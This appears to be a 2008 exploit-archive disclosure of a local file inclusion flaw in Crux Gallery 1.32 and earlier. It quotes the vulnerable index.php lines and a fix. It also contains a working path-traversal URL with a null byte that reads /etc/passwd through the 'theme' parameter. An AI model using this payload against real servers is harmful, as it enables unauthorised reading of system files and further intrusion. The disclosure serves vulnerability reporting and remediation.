[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Crux Gallery <= 1.32 (index.php theme) Local File Inclusion Vulnerability
# Published : 2008-10-01
# Author : StAkeR
# Previous Title : Libra PHP File Manager <= 1.18 Insecure Cookie Handling Vulnerability
# Next Title : phpScheduleIt <= 1.2.10 (reserve.php) Remote Code Execution Exploit
~~+=========================================================+~~
~~+=========================================================+~~
[?] Crux Gallery <= 1.32 Local File Inclusion Vulnerability
[?] Discovered On: 01/10/2008
[*] PHP.ini
[*] Magic_Quotes_Gpc = Off
~~+=========================================================+~~
(index.php) // Greetz -> Osirys and darkjoker
14. $m = $_GET['m'];
15. $p = $_GET['p'];
16. $dir = $_GET['dir'];
17. require_once("main.php");
18. require_once("themes/".$theme."/theme.php");
$theme isn't declared, so you can include any file.
[*] http//[path]/index.php?theme=../../../../../etc/passwd%00
[*] How To Fix: declare $theme
~~+=========================================================+~~
# www.Syue.com [2008-10-01]